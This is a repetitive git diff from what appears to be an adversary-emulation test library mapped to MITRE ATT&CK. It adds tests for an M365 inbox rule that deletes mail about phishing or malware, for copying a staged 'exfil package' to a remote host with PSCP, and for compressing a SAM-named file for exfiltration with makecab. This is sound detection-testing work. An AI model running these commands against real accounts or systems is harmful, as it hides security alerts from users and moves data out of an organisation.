+          description: M365 Password
+          type: string
+          default: p4sswd
+        mail_rulename:
+          description: Name of the inbox rule.
+          type: string
+          default: default
+        target_mailbox:
+          description: Mailbox you are creating the rule in
+          type: string
+          default: jane@contoso.com
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'ExchangeOnlineManagement module must be installed.
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name ExchangeOnlineManagement
+          -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name ExchangeOnlineManagement -Force
+
+          '
+      executor:
+        command: |
+          Import-Module ExchangeOnlineManagement
+          $password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
+          $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
+          Connect-ExchangeOnline -Credential $credential -ErrorAction:SilentlyContinue
+          New-InboxRule -Mailbox #{target_mailbox} -Name #{mail_rulename} -SubjectOrBodyContainsWords ("phish","malware","hacked") -Confirm:$false -DeleteMessage:$true
+        cleanup_command: |
+          Import-Module ExchangeOnlineManagement
+          $password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
+          $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
+          Connect-ExchangeOnline -Credential $credential
+          Remove-InboxRule -Mailbox #{target_mailbox} -Identity #{mail_rulename} -Confirm:$false
+        name: powershell
+        elevation_required: false
  T1027.013:
    technique:
      modified: '2024-04-19T04:03:07.164Z'
@@ -876,7 +876,7 @@ defense-evasion:
  T1564.008:
    technique:
      modified: '2023-10-16T16:41:53.957Z'
-      name: Email Hiding Rules
+      name: 'Hide Artifacts: Email Hiding Rules'
      description: |-
        Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)

@@ -951,6 +951,7 @@ defense-evasion:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1564.008
    atomic_tests: []
  T1027.013:
    technique:
@@ -876,7 +876,7 @@ defense-evasion:
  T1564.008:
    technique:
      modified: '2023-10-16T16:41:53.957Z'
-      name: Email Hiding Rules
+      name: 'Hide Artifacts: Email Hiding Rules'
      description: |-
        Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)

@@ -951,6 +951,7 @@ defense-evasion:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1564.008
    atomic_tests: []
  T1027.013:
    technique:
@@ -876,7 +876,7 @@ defense-evasion:
  T1564.008:
    technique:
      modified: '2023-10-16T16:41:53.957Z'
-      name: Email Hiding Rules
+      name: 'Hide Artifacts: Email Hiding Rules'
      description: |-
        Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)

@@ -951,6 +951,7 @@ defense-evasion:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1564.008
    atomic_tests: []
  T1027.013:
    technique:
@@ -876,7 +876,7 @@ defense-evasion:
  T1564.008:
    technique:
      modified: '2023-10-16T16:41:53.957Z'
-      name: Email Hiding Rules
+      name: 'Hide Artifacts: Email Hiding Rules'
      description: |-
        Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)

@@ -951,6 +951,7 @@ defense-evasion:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1564.008
    atomic_tests: []
  T1027.013:
    technique:
@@ -876,7 +876,7 @@ defense-evasion:
  T1564.008:
    technique:
      modified: '2023-10-16T16:41:53.957Z'
-      name: Email Hiding Rules
+      name: 'Hide Artifacts: Email Hiding Rules'
      description: |-
        Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)

@@ -951,6 +951,7 @@ defense-evasion:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1564.008
    atomic_tests: []
  T1027.013:
    technique:
@@ -876,7 +876,7 @@ defense-evasion:
  T1564.008:
    technique:
      modified: '2023-10-16T16:41:53.957Z'
-      name: Email Hiding Rules
+      name: 'Hide Artifacts: Email Hiding Rules'
      description: |-
        Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)

@@ -951,6 +951,7 @@ defense-evasion:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1564.008
    atomic_tests: []
  T1027.013:
    technique:
@@ -1818,7 +1818,7 @@ defense-evasion:
  T1564.008:
    technique:
      modified: '2023-10-16T16:41:53.957Z'
-      name: Email Hiding Rules
+      name: 'Hide Artifacts: Email Hiding Rules'
      description: |-
        Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)

@@ -1893,7 +1893,59 @@ defense-evasion:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
-    atomic_tests: []
+      identifier: T1564.008
+    atomic_tests:
+    - name: New-Inbox Rule to Hide E-mail in M365
+      auto_generated_guid: 30f7d3d1-78e2-4bf0-9efa-a175b5fce2a9
+      description: |
+        This test simulates a user adding an inbox rule in M365 to delete emails with specific keywords in email subject or body.
+         Reference: https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        auth_username:
+          description: M365 Username
+          type: string
+          default: john@contoso.com
+        auth_password:
+          description: M365 Password
+          type: string
+          default: p4sswd
+        mail_rulename:
+          description: Name of the inbox rule.
+          type: string
+          default: default
+        target_mailbox:
+          description: Mailbox you are creating the rule in
+          type: string
+          default: jane@contoso.com
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'ExchangeOnlineManagement module must be installed.
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name ExchangeOnlineManagement
+          -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name ExchangeOnlineManagement -Force
+
+          '
+      executor:
+        command: |
+          Import-Module ExchangeOnlineManagement
+          $password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
+          $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
+          Connect-ExchangeOnline -Credential $credential -ErrorAction:SilentlyContinue
+          New-InboxRule -Mailbox #{target_mailbox} -Name #{mail_rulename} -SubjectOrBodyContainsWords ("phish","malware","hacked") -Confirm:$false -DeleteMessage:$true
+        cleanup_command: |
+          Import-Module ExchangeOnlineManagement
+          $password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
+          $credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
+          Connect-ExchangeOnline -Credential $credential
+          Remove-InboxRule -Mailbox #{target_mailbox} -Identity #{mail_rulename} -Confirm:$false
+        name: powershell
+        elevation_required: false
  T1027.013:
    technique:
      modified: '2024-04-19T04:03:07.164Z'
@@ -78992,6 +79044,66 @@ command-and-control:
        cleanup_command: rm "#{local_file_path}" 2>$null | Out-Null
        name: powershell
        elevation_required: true
+    - name: Remote File Copy using PSCP
+      auto_generated_guid: c82b1e60-c549-406f-9b00-0a8ae31c9cfe
+      description: 'Copy a staged file using PSCP.exe to a public target location.
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        pscp_url:
+          description: pscp.exe download path
+          type: string
+          default: https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe
+        pscp_binary:
+          description: PSCP binary location
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\pscp.exe
+        scp_user:
+          description: Username of the SCP user
+          type: string
+          default: atomic
+        scp_password:
+          description: Password for the SCP User
+          type: string
+          default: atomic
+        scp_port:
+          description: port for the remote server
+          type: string
+          default: '22'
+        exfil_package:
+          description: path to exfil package
+          type: path
+          default: C:\Temp\T1105_scp.zip
+        target_location:
+          description: Remote location where the data will be copied to.
+          type: string
+          default: 127.0.0.1
+        target_filename:
+          description: Filename on the destination.
+          type: string
+          default: T1105_scp.zip
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'pscp.exe must be available on the system.
+
+          '
+        prereq_command: 'if (Test-Path #{pscp_binary}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "#{pscp_url}" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\pscp.exe"
+      executor:
+        command: |
+          fsutil file createnew C:\Temp\T1105_scp.zip 1048576
+          echo y | #{pscp_binary} -P #{scp_port} -pw #{scp_password} #{exfil_package} #{scp_user}@#{target_location}:#{target_filename}
+        cleanup_command: 'del /f /q #{exfil_package}
+
+          '
+        name: command_prompt
+        elevation_required: false
  T1665:
    technique:
      modified: '2024-04-18T19:44:00.603Z'
@@ -80100,6 +80212,42 @@ collection:
          rm c:\temp\loghost.txt
        name: powershell
        elevation_required: true
+    - name: Compress a File for Exfiltration using Makecab
+      auto_generated_guid: 2a7bc405-9555-4f49-ace2-b2ae2941d629
+      description: |
+        An adversary may compress data using Makecab (in-built Windows binary) that is collected prior to exfiltration.
+        [reference](https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/)
+      supported_platforms:
+      - windows
+      input_arguments:
+        input_file:
+          description: Path to source file for compression
+          type: path
+          default: C:\Temp\sam.hiv
+        output_file:
+          description: Path of the CAB file
+          type: path
+          default: C:\Temp\art.zip
+      dependencies:
+      - description: 'A sample file for compression must be located at specified location
+          (#{input_file})
+
+          '
+        prereq_command: 'if not exist "#{input_file}" (exit /b 1)
+
+          '
+        get_prereq_command: 'fsutil file createnew c:\Temp\sam.hiv 10485760
+
+          '
+      executor:
+        name: command_prompt
+        elevation_required: false
+        command: 'makecab.exe #{input_file} #{output_file}
+
+          '
+        cleanup_command: 'del #{output_file}
+
+          '
  T1113:
    technique:
      modified: '2023-03-30T21:01:39.967Z'
@@ -1350,7 +1350,7 @@ defense-evasion:
  T1564.008:
    technique:
      modified: '2023-10-16T16:41:53.957Z'
-      name: Email Hiding Rules
+      name: 'Hide Artifacts: Email Hiding Rules'
      description: |-
        Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)

@@ -1425,6 +1425,7 @@ defense-evasion:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1564.008
    atomic_tests: []
  T1027.013:
    technique:
@@ -1149,7 +1149,7 @@ defense-evasion:
  T1564.008:
    technique:
      modified: '2023-10-16T16:41:53.957Z'
-      name: Email Hiding Rules
+      name: 'Hide Artifacts: Email Hiding Rules'
      description: |-
        Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)

@@ -1224,6 +1224,7 @@ defense-evasion:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1564.008
    atomic_tests: []
  T1027.013:
    technique:
@@ -876,7 +876,7 @@ defense-evasion:
  T1564.008:
    technique:
      modified: '2023-10-16T16:41:53.957Z'
-      name: Email Hiding Rules
+      name: 'Hide Artifacts: Email Hiding Rules'
      description: |-
        Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)

@@ -951,6 +951,7 @@ defense-evasion:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1564.008
    atomic_tests: []
  T1027.013:
    technique:
@@ -876,7 +876,7 @@ defense-evasion:
  T1564.008:
    technique:
      modified: '2023-10-16T16:41:53.957Z'
-      name: Email Hiding Rules
+      name: 'Hide Artifacts: Email Hiding Rules'
      description: |-
        Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)

@@ -951,6 +951,7 @@ defense-evasion:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1564.008
    atomic_tests: []
  T1027.013:
    technique:
@@ -1344,7 +1344,7 @@ defense-evasion:
  T1564.008:
    technique:
      modified: '2023-10-16T16:41:53.957Z'
-      name: Email Hiding Rules
+      name: 'Hide Artifacts: Email Hiding Rules'
      description: |-
        Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)

@@ -1419,6 +1419,7 @@ defense-evasion:
      x_mitre_attack_spec_version: 3.2.0
      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
      spec_version: '2.1'
+      identifier: T1564.008
    atomic_tests: []
  T1027.013:
    technique:
@@ -65338,6 +65339,66 @@ command-and-control:
        cleanup_command: rm "#{local_file_path}" 2>$null | Out-Null
        name: powershell
        elevation_required: true
+    - name: Remote File Copy using PSCP
+      auto_generated_guid: c82b1e60-c549-406f-9b00-0a8ae31c9cfe
+      description: 'Copy a staged file using PSCP.exe to a public target location.
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        pscp_url:
+          description: pscp.exe download path
+          type: string
+          default: https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe
+        pscp_binary:
+          description: PSCP binary location
+          type: string
+          default: PathToAtomicsFolder\..\ExternalPayloads\pscp.exe
+        scp_user:
+          description: Username of the SCP user
+          type: string
+          default: atomic
+        scp_password:
+          description: Password for the SCP User
+          type: string
+          default: atomic
+        scp_port:
+          description: port for the remote server
+          type: string
+          default: '22'
+        exfil_package:
+          description: path to exfil package
+          type: path
+          default: C:\Temp\T1105_scp.zip
+        target_location:
+          description: Remote location where the data will be copied to.
+          type: string
+          default: 127.0.0.1
+        target_filename:
+          description: Filename on the destination.
+          type: string
+          default: T1105_scp.zip
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'pscp.exe must be available on the system.
+
+          '
+        prereq_command: 'if (Test-Path #{pscp_binary}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+          Invoke-WebRequest "#{pscp_url}" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\pscp.exe"
+      executor:
+        command: |
+          fsutil file createnew C:\Temp\T1105_scp.zip 1048576
+          echo y | #{pscp_binary} -P #{scp_port} -pw #{scp_password} #{exfil_package} #{scp_user}@#{target_location}:#{target_filename}
+        cleanup_command: 'del /f /q #{exfil_package}
+
+          '
+        name: command_prompt
+        elevation_required: false
  T1665:
    technique:
      modified: '2024-04-18T19:44:00.603Z'
@@ -66172,6 +66233,42 @@ collection:
          rm c:\temp\loghost.txt
        name: powershell
        elevation_required: true
+    - name: Compress a File for Exfiltration using Makecab
+      auto_generated_guid: 2a7bc405-9555-4f49-ace2-b2ae2941d629
+      description: |
+        An adversary may compress data using Makecab (in-built Windows binary) that is collected prior to exfiltration.
+        [reference](https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/)
+      supported_platforms:
+      - windows
+      input_arguments:
+        input_file:
+          description: Path to source file for compression
+          type: path
+          default: C:\Temp\sam.hiv
+        output_file:
+          description: Path of the CAB file
+          type: path
+          default: C:\Temp\art.zip
+      dependencies:
+      - description: 'A sample file for compression must be located at specified location
+          (#{input_file})
+
+          '
+        prereq_command: 'if not exist "#{input_file}" (exit /b 1)
+
+          '
+        get_prereq_command: 'fsutil file createnew c:\Temp\sam.hiv 10485760
+
+          '
+      executor:
+        name: command_prompt
+        elevation_required: false
+        command: 'makecab.exe #{input_file} #{output_file}
+
+          '
+        cleanup_command: 'del #{output_file}
+
+          '
  T1113:
    technique:
      modified: '2023-03-30T21:01:39.967Z'
@@ -74,6 +74,8 @@ Files can also be transferred using various [Web Service](https://attack.mitre.o

 - [Atomic Test #32 - File Download with Sqlcmd.exe](#atomic-test-32---file-download-with-sqlcmdexe)

+- [Atomic Test #33 - Remote File Copy using PSCP](#atomic-test-33---remote-file-copy-using-pscp)
+

 <br/>

@@ -1523,4 +1525,62 @@ winget install Microsoft.Sqlcmd --silent 2>$null | Out-Null



+<br/>
+<br/>
+
+## Atomic Test #33 - Remote File Copy using PSCP
+Copy a staged file using PSCP.exe to a public target location.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c82b1e60-c549-406f-9b00-0a8ae31c9cfe
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| pscp_url | pscp.exe download path | string | https://the.earth.li/~sgtatham/putty/latest/w64/pscp.exe|
+| pscp_binary | PSCP binary location | string | PathToAtomicsFolder&#92;..&#92;ExternalPayloads&#92;pscp.exe|
+| scp_user | Username of the SCP user | string | atomic|
+| scp_password | Password for the SCP User | string | atomic|
+| scp_port | port for the remote server | string | 22|
+| exfil_package | path to exfil package | path | C:&#92;Temp&#92;T1105_scp.zip|
+| target_location | Remote location where the data will be copied to. | string | 127.0.0.1|
+| target_filename | Filename on the destination. | string | T1105_scp.zip|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+fsutil file createnew C:\Temp\T1105_scp.zip 1048576
+echo y | #{pscp_binary} -P #{scp_port} -pw #{scp_password} #{exfil_package} #{scp_user}@#{target_location}:#{target_filename}
+```
+
+#### Cleanup Commands:
+```cmd
+del /f /q #{exfil_package}
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: pscp.exe must be available on the system.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{pscp_binary}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
+Invoke-WebRequest "#{pscp_url}" -Outfile "PathToAtomicsFolder\..\ExternalPayloads\pscp.exe"
+```
+
+
+
+
 <br/>
@@ -30,6 +30,8 @@ Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZi

 - [Atomic Test #10 - ESXi - Remove Syslog remote IP](#atomic-test-10---esxi---remove-syslog-remote-ip)

+- [Atomic Test #11 - Compress a File for Exfiltration using Makecab](#atomic-test-11---compress-a-file-for-exfiltration-using-makecab)
+

 <br/>

@@ -584,4 +586,55 @@ Invoke-WebRequest "https://the.earth.li/~sgtatham/putty/latest/w64/plink.exe" -O



+<br/>
+<br/>
+
+## Atomic Test #11 - Compress a File for Exfiltration using Makecab
+An adversary may compress data using Makecab (in-built Windows binary) that is collected prior to exfiltration.
+[reference](https://unit42.paloaltonetworks.com/exchange-server-credential-harvesting/)
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 2a7bc405-9555-4f49-ace2-b2ae2941d629
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| input_file | Path to source file for compression | path | C:&#92;Temp&#92;sam.hiv|
+| output_file | Path of the CAB file | path | C:&#92;Temp&#92;art.zip|
+
+
+#### Attack Commands: Run with `command_prompt`! 
+
+
+```cmd
+makecab.exe #{input_file} #{output_file}
+```
+
+#### Cleanup Commands:
+```cmd
+del #{output_file}
+```
+
+
+
+#### Dependencies:  Run with `command_prompt`!
+##### Description: A sample file for compression must be located at specified location (#{input_file})
+##### Check Prereq Commands:
+```cmd
+if not exist "#{input_file}" (exit /b 1)
+```
+##### Get Prereq Commands:
+```cmd
+fsutil file createnew c:\Temp\sam.hiv 10485760
+```
+
+
+
+
 <br/>
@@ -0,0 +1,76 @@
+# T1564.008 - Hide Artifacts: Email Hiding Rules
+## [Description from ATT&CK](https://attack.mitre.org/techniques/T1564/008)
+<blockquote>Adversaries may use email rules to hide inbound emails in a compromised user's mailbox. Many email clients allow users to create inbox rules for various email functions, including moving emails to other folders, marking emails as read, or deleting emails. Rules may be created or modified within email clients or through external features such as the <code>New-InboxRule</code> or <code>Set-InboxRule</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets on Windows systems.(Citation: Microsoft Inbox Rules)(Citation: MacOS Email Rules)(Citation: Microsoft New-InboxRule)(Citation: Microsoft Set-InboxRule)
+
+Adversaries may utilize email rules within a compromised user's mailbox to delete and/or move emails to less noticeable folders. Adversaries may do this to hide security alerts, C2 communication, or responses to [Internal Spearphishing](https://attack.mitre.org/techniques/T1534) emails sent from the compromised account.
+
+Any user or administrator within the organization (or adversary with valid credentials) may be able to create rules to automatically move or delete emails. These rules can be abused to impair/delay detection had the email content been immediately seen by a user or defender. Malicious rules commonly filter out emails based on key words (such as <code>malware</code>, <code>suspicious</code>, <code>phish</code>, and <code>hack</code>) found in message bodies and subject lines. (Citation: Microsoft Cloud App Security)
+
+In some environments, administrators may be able to enable email rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.(Citation: Microsoft Mail Flow Rules 2023) Adversaries that abuse such features may be able to automatically modify or delete all emails related to specific topics (such as internal security incident notifications).</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - New-Inbox Rule to Hide E-mail in M365](#atomic-test-1---new-inbox-rule-to-hide-e-mail-in-m365)
+
+
+<br/>
+
+## Atomic Test #1 - New-Inbox Rule to Hide E-mail in M365
+This test simulates a user adding an inbox rule in M365 to delete emails with specific keywords in email subject or body.
+ Reference: https://www.mandiant.com/sites/default/files/2021-09/rpt-fin4.pdf
+
+**Supported Platforms:** Azure-ad
+
+
+**auto_generated_guid:** 30f7d3d1-78e2-4bf0-9efa-a175b5fce2a9
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| auth_username | M365 Username | string | john@contoso.com|
+| auth_password | M365 Password | string | p4sswd|
+| mail_rulename | Name of the inbox rule. | string | default|
+| target_mailbox | Mailbox you are creating the rule in | string | jane@contoso.com|
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+Import-Module ExchangeOnlineManagement
+$password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
+$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
+Connect-ExchangeOnline -Credential $credential -ErrorAction:SilentlyContinue
+New-InboxRule -Mailbox #{target_mailbox} -Name #{mail_rulename} -SubjectOrBodyContainsWords ("phish","malware","hacked") -Confirm:$false -DeleteMessage:$true
+```
+
+#### Cleanup Commands:
+```powershell
+Import-Module ExchangeOnlineManagement
+$password = ConvertTo-SecureString -String "#{auth_password}" -AsPlainText -Force
+$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList "#{auth_username}", $password
+Connect-ExchangeOnline -Credential $credential
+Remove-InboxRule -Mailbox #{target_mailbox} -Identity #{mail_rulename} -Confirm:$false
+```
+
+
+
+#### Dependencies:  Run with `powershell`!
+##### Description: ExchangeOnlineManagement module must be installed.
+##### Check Prereq Commands:
+```powershell
+try {if (Get-InstalledModule -Name ExchangeOnlineManagement -ErrorAction SilentlyContinue) {exit 0} else {exit 1}} catch {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+Install-Module -Name ExchangeOnlineManagement -Force
+```
+
+
+
+
+<br/>